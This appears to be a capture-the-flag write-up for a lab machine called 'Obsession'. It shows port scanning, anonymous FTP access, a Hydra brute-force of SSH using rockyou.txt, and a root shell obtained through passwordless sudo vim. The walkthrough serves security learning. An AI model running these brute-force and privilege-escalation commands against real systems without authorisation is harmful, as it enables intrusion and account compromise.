Skip to main content

Obsession

export TARGET_IP=172.17.0.2
nmap -p0- $TARGET_IP
PortStateService
21/tcpopenFTP
22/tcpopenSSH
80/tcpopenHTTP

FTP Service

Anonymous Login

A common misconfiguration in FTP servers is allowing anonymous access. An attempt was made to log in using anonymous credentials.

ftp $TARGET_IP

Credentials:

  • Username: anonymous
  • Password: (blank)

Result: The anonymous login was successful, granting access to the FTP server.

File Discovery and Retrieval

The ls command was used to list the contents of the accessible directory.

ftp> ls

Output:

-rw-r--r--    1 0        0             667 Jun 18  2024 chat-gonza.txt
-rw-r--r--    1 0        0             315 Jun 18  2024 pendientes.txt

Two files, chat-gonza.txt and pendientes.txt, were discovered and subsequently downloaded using the get command.

ftp> get chat-gonza.txt
ftp> get pendientes.txt

Content Analysis

The retrieved files were analyzed for sensitive information.

cat chat-gonza.txt pendientes.txt

Content Summary:

  • chat-gonza.txt: A chat log between two users, "Gonza" and "Russoski," discussing a video hosted on a secure location within Russoski's computer and mentioning a gym session.
  • pendientes.txt: A to-do list containing tasks related to a certification, online services, a vulnerable lab project, and security configurations.

Inferred Information: Potential usernames: gonza and russoski. Visit the webpage in http://172.17.0.2/ and with some basic investigation you can realize that Russoski could be behind this.

SSH Brute-Force

Based on the discovered username russoski and the common password list rockyou.txt, a brute-force attack was launched against the SSH service using Hydra.

hydra -l "russoski" -P /usr/share/wordlists/rockyou.txt ssh://$TARGET_IP -f

Result: The attack successfully identified the password iloveme for the user russoski.

Privilege Escalation

Using the obtained credentials, a successful SSH connection was established.

ssh russoski@$TARGET_IP

The sudo -l command revealed that the user russoski could execute vim as root without a password.

sudo -l

Output:

Matching Defaults entries for russoski on 96d1d89bd82e:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User russoski may run the following commands on 96d1d89bd82e:
    (root) NOPASSWD: /usr/bin/vim

Exploiting Vim for Root Shell

Leveraging the GTFOBins resource (https://gtfobins.github.io/gtfobins/vim/#sudo), a root shell was obtained by executing Vim with a specific command.

sudo vim -c ':!/bin/sh'
id

Result: Successful privilege escalation to root, confirmed by the id command output: uid=0(root) gid=0(root) groups=0(root).